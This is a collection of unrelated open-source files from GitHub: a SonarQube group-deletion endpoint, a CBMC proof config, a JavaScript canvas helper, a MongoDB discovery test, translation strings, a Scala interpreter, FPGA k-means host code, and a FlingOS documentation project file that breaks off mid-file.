* You should have received a copy of the GNU Lesser General Public License
* along with this program; if not, write to the Free Software Foundation,
* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/
package org.sonar.server.usergroups.ws;
import org.sonar.api.server.ws.Change;
import org.sonar.api.server.ws.Request;
import org.sonar.api.server.ws.Response;
import org.sonar.api.server.ws.WebService;
import org.sonar.api.server.ws.WebService.NewController;
import org.sonar.db.DbClient;
import org.sonar.db.DbSession;
import org.sonar.db.permission.OrganizationPermission;
import org.sonar.db.user.GroupDto;
import org.sonar.server.user.UserSession;
import static com.google.common.base.Preconditions.checkArgument;
import static java.lang.String.format;
import static org.sonar.server.usergroups.ws.GroupWsSupport.PARAM_GROUP_ID;
import static org.sonar.server.usergroups.ws.GroupWsSupport.PARAM_GROUP_NAME;
import static org.sonar.server.usergroups.ws.GroupWsSupport.defineGroupWsParameters;
public class DeleteAction implements UserGroupsWsAction {
private final DbClient dbClient;
private final UserSession userSession;
private final GroupWsSupport support;
public DeleteAction(DbClient dbClient, UserSession userSession, GroupWsSupport support) {
this.dbClient = dbClient;
this.userSession = userSession;
this.support = support;
}
@Override
public void define(NewController context) {
WebService.NewAction action = context.createAction("delete")
.setDescription(format("Delete a group. The default groups cannot be deleted.<br/>" +
"'%s' or '%s' must be provided.<br />" +
"Requires the following permission: 'Administer System'.",
PARAM_GROUP_ID, PARAM_GROUP_NAME))
.setHandler(this)
.setSince("5.2")
.setPost(true)
.setChangelog(
new Change("8.4", "Parameter 'id' is deprecated. Format changes from integer to string. Use 'name' instead."));
defineGroupWsParameters(action);
}
@Override
public void handle(Request request, Response response) throws Exception {
try (DbSession dbSession = dbClient.openSession(false)) {
GroupDto group = support.findGroupDto(dbSession, request);
userSession.checkPermission(OrganizationPermission.ADMINISTER, group.getOrganizationUuid());
support.checkGroupIsNotDefault(dbSession, group);
checkNotTryingToDeleteLastAdminGroup(dbSession, group);
removeGroupPermissions(dbSession, group);
removeFromPermissionTemplates(dbSession, group);
removeGroupMembers(dbSession, group);
dbClient.qProfileEditGroupsDao().deleteByGroup(dbSession, group);
dbClient.groupDao().deleteByUuid(dbSession, group.getUuid());
dbSession.commit();
response.noContent();
}
}
private void checkNotTryingToDeleteLastAdminGroup(DbSession dbSession, GroupDto group) {
int remaining = dbClient.authorizationDao().countUsersWithGlobalPermissionExcludingGroup(dbSession,
group.getOrganizationUuid(), OrganizationPermission.ADMINISTER.getKey(), group.getUuid());
checkArgument(remaining > 0, "The last system admin group cannot be deleted");
}
private void removeGroupPermissions(DbSession dbSession, GroupDto group) {
dbClient.roleDao().deleteGroupRolesByGroupUuid(dbSession, group.getUuid());
}
private void removeFromPermissionTemplates(DbSession dbSession, GroupDto group) {
dbClient.permissionTemplateDao().deleteByGroup(dbSession, group.getUuid());
}
private void removeGroupMembers(DbSession dbSession, GroupDto group) {
dbClient.userGroupDao().deleteByGroupUuid(dbSession, group.getUuid());
}
}
| {
"pile_set_name": "Github"
} |
{ "expected-missing-functions":
[
"vLoggingPrintf",
"xApplicationGetRandomNumber",
"vListInsertEnd",
"vTaskSetTimeOutState",
"vTaskSuspendAll",
"xTaskGetTickCount",
"xTaskResumeAll"
],
"proof-name": "DNSgetHostByName_a",
"proof-root": "tools/cbmc/proofs"
}
| {
"pile_set_name": "Github"
} |
// Setup a very simple "virtual canvas" to make drawing the few shapes we need easier
// This is accessible as $(foo).simpledraw()
VShape = createClass({
init: function (target, id, type, args) {
this.target = target;
this.id = id;
this.type = type;
this.args = args;
},
append: function () {
this.target.appendShape(this);
return this;
}
});
VCanvas_base = createClass({
_pxregex: /(\d+)(px)?\s*$/i,
init: function (width, height, target) {
if (!width) {
return;
}
this.width = width;
this.height = height;
this.target = target;
this.lastShapeId = null;
if (target[0]) {
target = target[0];
}
$.data(target, '_jqs_vcanvas', this);
},
drawLine: function (x1, y1, x2, y2, lineColor, lineWidth) {
return this.drawShape([[x1, y1], [x2, y2]], lineColor, lineWidth);
},
drawShape: function (path, lineColor, fillColor, lineWidth) {
return this._genShape('Shape', [path, lineColor, fillColor, lineWidth]);
},
drawCircle: function (x, y, radius, lineColor, fillColor, lineWidth) {
return this._genShape('Circle', [x, y, radius, lineColor, fillColor, lineWidth]);
},
drawPieSlice: function (x, y, radius, startAngle, endAngle, lineColor, fillColor) {
return this._genShape('PieSlice', [x, y, radius, startAngle, endAngle, lineColor, fillColor]);
},
drawRect: function (x, y, width, height, lineColor, fillColor) {
return this._genShape('Rect', [x, y, width, height, lineColor, fillColor]);
},
getElement: function () {
return this.canvas;
},
/**
* Return the most recently inserted shape id
*/
getLastShapeId: function () {
return this.lastShapeId;
},
/**
* Clear and reset the canvas
*/
reset: function () {
alert('reset not implemented');
},
_insert: function (el, target) {
$(target).html(el);
},
/**
* Calculate the pixel dimensions of the canvas
*/
_calculatePixelDims: function (width, height, canvas) {
// XXX This should probably be a configurable option
var match;
match = this._pxregex.exec(height);
if (match) {
this.pixelHeight = match[1];
} else {
this.pixelHeight = $(canvas).height();
}
match = this._pxregex.exec(width);
if (match) {
this.pixelWidth = match[1];
} else {
this.pixelWidth = $(canvas).width();
}
},
/**
* Generate a shape object and id for later rendering
*/
_genShape: function (shapetype, shapeargs) {
var id = shapeCount++;
shapeargs.unshift(id);
return new VShape(this, id, shapetype, shapeargs);
},
/**
* Add a shape to the end of the render queue
*/
appendShape: function (shape) {
alert('appendShape not implemented');
},
/**
* Replace one shape with another
*/
replaceWithShape: function (shapeid, shape) {
alert('replaceWithShape not implemented');
},
/**
* Insert one shape after another in the render queue
*/
insertAfterShape: function (shapeid, shape) {
alert('insertAfterShape not implemented');
},
/**
* Remove a shape from the queue
*/
removeShapeId: function (shapeid) {
alert('removeShapeId not implemented');
},
/**
* Find a shape at the specified x/y co-ordinates
*/
getShapeAt: function (el, x, y) {
alert('getShapeAt not implemented');
},
/**
* Render all queued shapes onto the canvas
*/
render: function () {
alert('render not implemented');
}
});
| {
"pile_set_name": "Github"
} |
description: "Handle a not-ok ismaster response"
uri: "mongodb://a"
phases: [
{
responses: [
["a:27017", {
ok: 1,
ismaster: true,
minWireVersion: 0,
maxWireVersion: 6
}],
["a:27017", {
ok: 0,
ismaster: true,
minWireVersion: 0,
maxWireVersion: 6
}]
],
outcome: {
servers: {
"a:27017": {
type: "Unknown",
setName:
}
},
topologyType: "Single",
logicalSessionTimeoutMinutes: null,
setName:
}
}
]
| {
"pile_set_name": "Github"
} |
"description_1" : "<span class=\"translated\">If the switching command is detected, the selected MP3 file is played with the specified volume and stopped with the next detection (toggle function).</span><br/><br/>",
"description_2" : "<span class=\"translated\">" +
"The switching command 'Dry conditions' plays the selected MP3 file with the defined volume in dry conditions, in case of rain the MP3 is stopped. " +
"The switching command 'Rain' plays the selected MP3 file with the defined volume in case of rain, in dry conditions the MP3 is stopped."
"</span><br/><br/>",
"description_3" : "<span class=\"translated\">The profile is not active.</span>",
"subset_1" : "Rain - off / dry conditions - on",
"subset_2" : "Rain - on / dry conditions - off",
"subset_3" : "Dry conditions",
"subset_4" : "Rain",
"subset_6" : "Rain - on/off",
"subset_7" : "Dry conditions - on/off",
"_at" : "<span class=\"translated\">when</span>",
| {
"pile_set_name": "Github"
} |
object callccInterpreter {
type Answer = Value
/**
* A continuation monad.
*/
case class M[A](in: (A => Answer) => Answer) {
def bind[B](k: A => M[B]) = M[B](c => in (a => k(a) in c))
def map[B](f: A => B): M[B] = bind(x => unitM(f(x)))
def flatMap[B](f: A => M[B]): M[B] = bind(f)
}
def unitM[A](a: A) /*?*/ = M[A](c => c(a))
def id[A] /*?*/ = (x: A) => x
def showM(m: M[Value]) /*?*/ = (m in id).toString()
def callCC[A](h: (A => M[A]) => M[A]) =
M[A](c => h(a => M[A](d => c(a))) in c)
type Name = String
trait Term
case class Var(x: Name) extends Term
case class Con(n: int) extends Term
case class Add(l: Term, r: Term) extends Term
case class Lam(x: Name, body: Term) extends Term
case class App(fun: Term, arg: Term) extends Term
case class Ccc(x: Name, t: Term) extends Term
trait Value
case object Wrong extends Value {
override def toString() = "wrong"
}
case class Num(n: Int) extends Value {
override def toString() = n.toString()
}
case class Fun(f: Value => M[Value]) extends Value {
override def toString() = "<function>"
}
type Environment = List[Pair[Name, Value]]
def lookup(x: Name, e: Environment): M[Value] = e match {
case List() => unitM(Wrong)
case Pair(y, b) :: e1 => if (x == y) unitM(b) else lookup(x, e1)
}
def add(a: Value, b: Value) /*?*/ = Pair(a, b) match {
case Pair(Num(m), Num(n)) => this./*!*/unitM(Num(m + n))
case _ => unitM(Wrong)
}
def apply(a: Value, b: Value): M[Value] = a match {
case Fun(k) => k(b)
case _ => unitM(Wrong)
}
def interp(t: Term, e: Environment): M[Value] = t match {
case Var(x) => lookup(x, e)
case Con(n) => unitM(Num(n))
case Add(l, r) => for (val a <- interp(l, e);
val b <- interp(r, e);
val c <- add(a, b))
yield c
case Lam(x, t) => unitM(Fun(a => interp(t, Pair(x, a) :: e)))
case App(f, t) => for (val a <- interp(f, e);
val b <- interp(t, e);
val c <- apply(a, b))
yield c
case Ccc(x, t) => callCC(k => interp(t, Pair(x, Fun(k)) :: e))
}
def test(t: Term): String = showM(interp(t, List()))
val term0 = App(Lam("x", Add(Var("x"), Var("x"))), Add(Con(10), Con(11)))
val term1 = App(Con(1), Con(2))
val term2 = Add(Con(1), Ccc("k", Add(Con(2), App(Var("k"), Con(4)))))
def main(args: Array[String]) {
println(test(term0))
println(test(term1))
println(test(term2))
}
} | {
"pile_set_name": "Github"
} |
/**********
Copyright (c) 2018, Xilinx, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
**********/
#include "fpga_kmeans.h"
#include "kmeans.h"
#include "xcl2.hpp"
#include <iostream>
#define FLOAT_DT 0
#define INT_DT 1
#define WORK_GROUP 2
#if USE_DATA_TYPE == INT_DT
#define DATA_TYPE unsigned int
#define INT_DATA_TYPE int
#else
#define DATA_TYPE float
#define INT_DATA_TYPE int
#endif
//Global Variables
int g_global_size = 1;
int g_vector_size = 16;
float g_scale_factor = 1.0;
#if USE_DATA_TYPE == INT_DT
static void calculate_scale_factor(float *mem, int size) {
float min = mem[0];
float max = mem[0];
for (int i = 0; i < size; i++) {
float value = mem[i];
if (value < min)
min = value;
if (value > max)
max = value;
}
float diff = max - min;
g_scale_factor = diff / 0x00FFFFFF;
printf("Float to Integer Scale Factor = %f MaxFloat=%f and MinFloat=%f \n",
g_scale_factor,
max,
min);
}
static int scaled_float2int(float value) {
int ret_value;
float fv = value;
float scaled_value = fv / g_scale_factor;
ret_value = scaled_value;
return ret_value;
}
#endif
static DATA_TYPE *re_align_clusters(float **clusters,
int n_clusters,
int N_Features,
int n_features) {
int next_cfeature = 0;
DATA_TYPE *temp_clusters =
(DATA_TYPE *)malloc(n_clusters * N_Features * sizeof(DATA_TYPE));
if (temp_clusters == NULL) {
fprintf(stderr, "Error: Failed to allocate memory for temp_clusters\n");
exit(EXIT_FAILURE);
}
for (int cid = 0; cid < n_clusters; cid++) {
for (int fid = 0; fid < N_Features; fid++) {
if (fid < n_features) {
float fValue = clusters[0][cid * n_features + fid];
DATA_TYPE value;
#if USE_DATA_TYPE == INT_DT
value = scaled_float2int(fValue);
#else
value = fValue;
#endif
temp_clusters[next_cfeature++] = value;
} else {
temp_clusters[next_cfeature++] = 0.0;
}
}
}
return temp_clusters;
}
static DATA_TYPE *re_align_features(float **feature,
int N_Features,
int NPoints,
int n_features,
int n_points,
int size) {
int next_feature = 0;
DATA_TYPE *temp_feature =
(DATA_TYPE *)malloc(NPoints * n_features * sizeof(DATA_TYPE));
if (temp_feature == NULL) {
fprintf(stderr, "Error: Failed to allocate memory for temp_feature\n");
exit(EXIT_FAILURE);
}
for (int pid = 0; pid < NPoints; pid += size) {
for (int fid = 0; fid < n_features; fid++) {
for (int tpid = 0; tpid < size; tpid++) {
if (pid + tpid < n_points) {
float fValue = feature[0][(pid + tpid) * n_features + fid];
DATA_TYPE value;
#if USE_DATA_TYPE == INT_DT
value = scaled_float2int(fValue);
#else
value = fValue;
#endif
temp_feature[next_feature++] = value;
} else {
temp_feature[next_feature++] = 0.0;
}
}
}
}
return temp_feature;
}
int FPGA_KMEANS::fpga_kmeans_compute(
float **feature, /* in: [npoints][nfeatures] */
int n_features,
int n_points,
int n_clusters,
int *membership,
float **clusters,
int *new_centers_len,
float **new_centers) {
cl_int err;
int delta = 0;
int i, j;
cl::Event wait_event;
int N_Features = ((n_features - 1) / g_vector_size + 1) * g_vector_size;
DATA_TYPE *temp_clusters =
re_align_clusters(clusters, n_clusters, N_Features, n_features);
int narg = 0;
OCL_CHECK(err, err = g_kernel_kmeans.setArg(narg++, d_feature));
OCL_CHECK(err, err = g_kernel_kmeans.setArg(narg++, d_cluster));
OCL_CHECK(err, err = g_kernel_kmeans.setArg(narg++, d_membership));
OCL_CHECK(err,
err = g_kernel_kmeans.setArg(
narg++, sizeof(cl_int), (void *)&n_points));
OCL_CHECK(err,
err = g_kernel_kmeans.setArg(
narg++, sizeof(cl_int), (void *)&n_clusters));
OCL_CHECK(err,
err = g_kernel_kmeans.setArg(
narg++, sizeof(cl_int), (void *)&n_features));
OCL_CHECK(err,
err = g_q.enqueueWriteBuffer(d_cluster,
CL_TRUE,
0,
n_clusters * N_Features *
sizeof(DATA_TYPE),
temp_clusters,
NULL,
NULL));
g_q.finish();
free(temp_clusters);
OCL_CHECK(err,
err = g_q.enqueueNDRangeKernel(g_kernel_kmeans,
0,
cl::NDRange(WORK_GROUP, 1, 1),
1,
NULL,
&wait_event));
g_q.finish();
OCL_CHECK(err, err = wait_event.wait());
unsigned long start, stop;
OCL_CHECK(err,
err = wait_event.getProfilingInfo<unsigned long>(
CL_PROFILING_COMMAND_START, &start));
OCL_CHECK(err,
err = wait_event.getProfilingInfo<unsigned long>(
CL_PROFILING_COMMAND_END, &stop));
g_t_exec += (stop - start);
g_iteration++;
OCL_CHECK(err,
err = g_q.enqueueReadBuffer(d_membership,
CL_TRUE,
0,
n_points * sizeof(INT_DATA_TYPE),
g_membership_OCL,
NULL,
NULL));
g_q.finish();
delta = 0;
for (i = 0; i < n_points; i++) {
int cluster_id = g_membership_OCL[i];
new_centers_len[cluster_id]++;
if (g_membership_OCL[i] != membership[i]) {
delta++;
membership[i] = g_membership_OCL[i];
}
for (j = 0; j < n_features; j++) {
new_centers[cluster_id][j] += feature[i][j];
}
}
return delta;
}
float **FPGA_KMEANS::fpga_kmeans_clustering(
float **feature, /* in: [npoints][nfeatures] */
int nfeatures,
int npoints,
int nclusters,
float threshold,
int *membership) /* out: [npoints] */
{
int i, j, n = 0; /* counters */
int loop = 0, temp;
int *new_centers_len; /* [nclusters]: no. of points in each cluster */
float delta; /* if the point moved */
float **clusters; /* out: [nclusters][nfeatures] */
float **new_centers; /* [nclusters][nfeatures] */
int *initial; /* used to hold the index of points not yet selected
prevents the "birthday problem" of dual selection (?)
considered holding initial cluster indices, but changed due to
possible, though unlikely, infinite loops */
int initial_points;
int c = 0;
/* nclusters should never be > npoints
that would guarantee a cluster without points */
if (nclusters > npoints)
nclusters = npoints;
/* allocate space for and initialize returning variable clusters[] */
clusters = (float **)malloc(nclusters * sizeof(float *));
if (clusters == NULL) {
fprintf(stderr, "Error: Failed to allocate memory for clusters\n");
exit(EXIT_FAILURE);
}
clusters[0] = (float *)malloc(nclusters * nfeatures * sizeof(float));
if (clusters[0] == NULL) {
fprintf(stderr, "Error: Failed to allocate memory for clusters[0]\n");
exit(EXIT_FAILURE);
}
for (i = 1; i < nclusters; i++)
clusters[i] = clusters[i - 1] + nfeatures;
/* initialize the random clusters */
initial = (int *)malloc(npoints * sizeof(int));
if (initial == NULL) {
fprintf(stderr, "Error: Failed to allocate memory for initial\n");
exit(EXIT_FAILURE);
}
for (i = 0; i < npoints; i++) {
initial[i] = i;
}
initial_points = npoints;
/* randomly pick cluster centers */
for (i = 0; i < nclusters && initial_points >= 0; i++) {
for (j = 0; j < nfeatures; j++)
clusters[i][j] = feature[initial[n]][j]; // remapped
/* swap the selected index to the end (not really necessary,
could just move the end up) */
temp = initial[n];
initial[n] = initial[initial_points - 1];
initial[initial_points - 1] = temp;
initial_points--;
n++;
}
/* initialize the membership to -1 for all */
for (i = 0; i < npoints; i++)
membership[i] = -1;
/* allocate space for and initialize new_centers_len and new_centers */
new_centers_len = (int *)calloc(nclusters, sizeof(int));
if (new_centers_len == NULL) {
fprintf(stderr,
"Error: Failed to allocate memory for new_centers_len\n");
exit(EXIT_FAILURE);
}
new_centers = (float **)malloc(nclusters * sizeof(float *));
if (new_centers == NULL) {
fprintf(stderr, "Error: Failed to allocate memory for new_centers\n");
exit(EXIT_FAILURE);
}
new_centers[0] = (float *)calloc(nclusters * nfeatures, sizeof(float));
if (new_centers[0] == NULL) {
fprintf(stderr,
"Error: Failed to allocate memory for new_centers[0]\n");
exit(EXIT_FAILURE);
}
for (i = 1; i < nclusters; i++)
new_centers[i] = new_centers[i - 1] + nfeatures;
/* iterate until convergence */
printf("\nRunning Iterations : ");
do {
printf(" %d ", loop + 1);
delta = 0.0;
// CUDA
delta = (float)fpga_kmeans_compute(
feature, /* in: [npoints][nfeatures] */
nfeatures, /* number of attributes for each point */
npoints, /* number of data points */
nclusters, /* number of clusters */
membership, /* which cluster the point belongs to */
clusters, /* out: [nclusters][nfeatures] */
new_centers_len, /* out: number of points in each cluster */
new_centers /* sum of points in each cluster */
);
/* replace old cluster centers with new_centers */
/* CPU side of reduction */
for (i = 0; i < nclusters; i++) {
for (j = 0; j < nfeatures; j++) {
if (new_centers_len[i] > 0)
clusters[i][j] =
new_centers[i][j] /
new_centers_len[i]; /* take average i.e. sum/n */
new_centers[i][j] = 0.0; /* set back to 0 */
}
new_centers_len[i] = 0; /* set back to 0 */
}
c++;
} while ((delta > threshold) &&
(loop++ < 1000)); /* makes sure loop terminates */
printf("\niterated %d times\n", c);
free(new_centers[0]);
free(new_centers);
free(new_centers_len);
return clusters;
}
int FPGA_KMEANS::fpga_kmeans_init(std::string &binaryFile) {
cl_int err;
auto devices = xcl::get_xil_devices();
auto device = devices[0];
OCL_CHECK(err, g_context = cl::Context(device, NULL, NULL, NULL, &err));
OCL_CHECK(err,
g_q = cl::CommandQueue(
g_context, device, CL_QUEUE_PROFILING_ENABLE, &err));
OCL_CHECK(err,
std::string device_name = device.getInfo<CL_DEVICE_NAME>(&err));
auto g_fileBuf = xcl::read_binary_file(binaryFile);
cl::Program::Binaries bins{{g_fileBuf.data(), g_fileBuf.size()}};
devices.resize(1);
OCL_CHECK(err, g_prog = cl::Program(g_context, devices, bins, NULL, &err));
OCL_CHECK(err, g_kernel_kmeans = cl::Kernel(g_prog, "kmeans", &err));
return 0;
}
int FPGA_KMEANS::fpga_kmeans_allocate(int n_points,
int n_features,
int n_clusters,
float **feature) {
cl_int err;
DATA_TYPE *temp_feature;
#if USE_DATA_TYPE == INT_DT
calculate_scale_factor(feature[0], n_points * n_features);
#endif
int N_Features = ((n_features - 1) / g_vector_size + 1) * g_vector_size;
int NPoints = ((n_points - 1) / g_vector_size + 1) * g_vector_size;
temp_feature = re_align_features(
feature, N_Features, NPoints, n_features, n_points, g_vector_size);
OCL_CHECK(err,
d_feature = cl::Buffer(g_context,
CL_MEM_COPY_HOST_PTR | CL_MEM_READ_WRITE,
NPoints * n_features * sizeof(DATA_TYPE),
temp_feature,
&err));
OCL_CHECK(err,
d_cluster =
cl::Buffer(g_context,
CL_MEM_ALLOC_HOST_PTR | CL_MEM_READ_WRITE,
n_clusters * N_Features * sizeof(DATA_TYPE),
NULL,
&err));
OCL_CHECK(err,
d_membership =
cl::Buffer(g_context,
CL_MEM_ALLOC_HOST_PTR | CL_MEM_READ_WRITE,
NPoints * sizeof(INT_DATA_TYPE),
NULL,
&err));
free(temp_feature);
g_membership_OCL = (INT_DATA_TYPE *)malloc(n_points * sizeof(int));
if (g_membership_OCL == NULL) {
fprintf(stderr,
"Error: Failed to allocate memory for g_membership_OCL\n");
exit(EXIT_FAILURE);
}
return true;
}
int FPGA_KMEANS::fpga_kmeans_deallocateMemory() {
free(g_membership_OCL);
return true;
}
int FPGA_KMEANS::fpga_kmeans_print_report() {
printf("*******************************************************\n");
printf("\tK-means Execution Summary:\n");
printf("*******************************************************\n");
printf("\tGlobal Size : %d\n", g_global_size);
printf("\tIteration : %d\n", g_iteration);
//Deviding time by 1E6 to change ns(nano sec) to ms (mili sec)
printf("\tKernel Execution Time(ms) : %f\n", g_t_exec / 1E6);
printf("*******************************************************\n");
return 0;
}
int FPGA_KMEANS::fpga_kmeans_setup(int global_size) {
g_global_size = global_size;
return 0;
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
<PropertyGroup>
<!-- The configuration and platform will be used to determine which assemblies to include from solution and
project documentation sources -->
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<SchemaVersion>2.0</SchemaVersion>
<ProjectGuid>{040b4922-9973-4bc6-b63d-11ce1389a86a}</ProjectGuid>
<SHFBSchemaVersion>1.9.9.0</SHFBSchemaVersion>
<!-- AssemblyName, Name, and RootNamespace are not used by SHFB but Visual Studio adds them anyway -->
<AssemblyName>Documentation</AssemblyName>
<RootNamespace>Documentation</RootNamespace>
<Name>Documentation</Name>
<!-- SHFB properties -->
<FrameworkVersion>.NET Framework 4.5</FrameworkVersion>
<OutputPath>.\Help\</OutputPath>
<HtmlHelpName>Documentation</HtmlHelpName>
<Language>en-US</Language>
<BuildAssemblerVerbosity>AllMessages</BuildAssemblerVerbosity>
<HelpFileFormat>Markdown</HelpFileFormat>
<IndentHtml>True</IndentHtml>
<KeepLogFile>False</KeepLogFile>
<DisableCodeBlockComponent>True</DisableCodeBlockComponent>
<CppCommentsFixup>False</CppCommentsFixup>
<CleanIntermediates>True</CleanIntermediates>
<DocumentationSources>
<DocumentationSource sourceFile="..\FlingOS.sln" xmlns="" />
</DocumentationSources>
<MissingTags>Summary, Parameter, Returns, Value, AutoDocumentCtors, Namespace, TypeParameter, IncludeTargets, AutoDocumentDispose</MissingTags>
<VisibleItems>Attributes, ExplicitInterfaceImplementations, InheritedMembers, Internals, Privates, PrivateFields, Protected, SealedProtected</VisibleItems>
<PlugInConfigurations>
</PlugInConfigurations>
<TransformComponentArguments>
<Argument Key="logoFile" Value="FlingOS-Logo-Blue.png" />
<Argument Key="logoHeight" Value="" />
<Argument Key="logoWidth" Value="100" />
<Argument Key="logoAltText" Value="Fling OS" />
<Argument Key="logoPlacement" Value="left" />
<Argument Key="logoAlignment" Value="left" />
<Argument Key="maxVersionParts" Value="" />
<Argument Key="defaultLanguage" Value="cs" />
</TransformComponentArguments>
<ComponentConfigurations>
</ComponentConfigurations>
<MaximumGroupParts>3</MaximumGroupParts>
<NamespaceGrouping>False</NamespaceGrouping>
<SyntaxFilters>C#</SyntaxFilters>
<SdkLinkTarget>Blank</SdkLinkTarget>
<RootNamespaceContainer>True</RootNamespaceContainer>
<PresentationStyle>Markdown</PresentationStyle>
<Preliminary>False</Preliminary>
<NamingMethod>MemberName</NamingMethod>
<HelpTitle>FlingOS™</HelpTitle>
<ContentPlacement>AboveNamespaces</ContentPlacement>
<NamespaceSummaries>
<NamespaceSummaryItem name="Kernel" isDocumented="True">Contains the main classes for the Fling OS kernel.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel (Group)" isGroup="True" isDocumented="True">Contains the main namespaces for the Fling OS kernel.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System" isDocumented="True">The kernel's System namespace that largely replaces .Net's System namespace.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.Exceptions" isDocumented="True">Contains the standard exceptions for the kernel.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.Collections" isDocumented="True">Classes for managing collections of objects.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.IO" isDocumented="True">Classes for managing input/output tasks such as file handling.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.IO.Disk" isDocumented="True">Classes for handling disks (e.g. hard-disks).</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.IO.FAT" isDocumented="True">Classes for handling a FAT file system.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.IO.Streams" isDocumented="True">Classes for handling streams.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.IO.Streams.FAT" isDocumented="True">Classes for handling FAT streams such as FAT file streams.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.Stubs" isDocumented="True">Contains stubs for the FOS_System namespace.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware" isDocumented="True">The kernel's Hardware namespace contains classes that handle specific hardware.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.ATA" isDocumented="True">Contains classes for handling ATA devices.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Devices" isDocumented="True">Contains classes for generic types of hardware device e.g. DiskDevice.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.DMA" isDocumented="True">Contains classes for managing direct memory access.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.IO" isDocumented="True">Contains classes for managing I/O devices.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.PCI" isDocumented="True">Contains classes for managing PCI devices.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.USB" isDocumented="True">Contains classes for managing USB devices.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.USB.HCIs" isDocumented="True">Contains classes specifically for managing USB Host Controller Interfaces.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Utilities" isDocumented="True">Contains Kernel utility classes and functions that can be used throughout the kernel.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System (Group)" isGroup="True" isDocumented="True">Contains namespaces related to Kernel.FOS_System and sub-namespaces.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware (Group)" isGroup="True" isDocumented="True">Contains namespaces related to Kernel.Hardware and sub-namespaces.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Core (Group)" isGroup="True" isDocumented="True">Contains namespaces related to Kernel.Core and sub-namespaces.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Core" isDocumented="True">Contains classes that handle core kernel functionality but which is at least 1-level abstracted from the specific hardware.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Core.Consoles" isDocumented="True">Contains specific implementations of the Console class.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Core.Shells" isDocumented="True">Contains specific implementations of the Shell class.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.CPUs" isDocumented="True">Contains specific implementations of the CPU class.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Interrupts" isDocumented="True">Contains hardware-specific code for managing interrupts.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Keyboards" isDocumented="True">Contains specific implementations of the Keyboard class.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Timers" isDocumented="True">Contains specific implementations of the Timer class.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.USB.Devices" isDocumented="True">Contains implementations of drivers for USB devices.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.VirtMem" isDocumented="True">Contains specific implementations of virtual memory management for different architectures.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.USB (Group)" isGroup="True" isDocumented="True">Contains namespaces related to Kernel.Hardware.USB and sub-namespaces.</NamespaceSummaryItem>
<NamespaceSummaryItem name="(global)" isDocumented="True" />
<NamespaceSummaryItem name="Drivers.Compiler" isDocumented="True">Contains all libraries and classes related to the compiler which is capable of compiling both the Kernel and drivers. The Drivers Compiler replaces the Kernel Compiler and significantly improves speed and compiler architecture.</NamespaceSummaryItem>
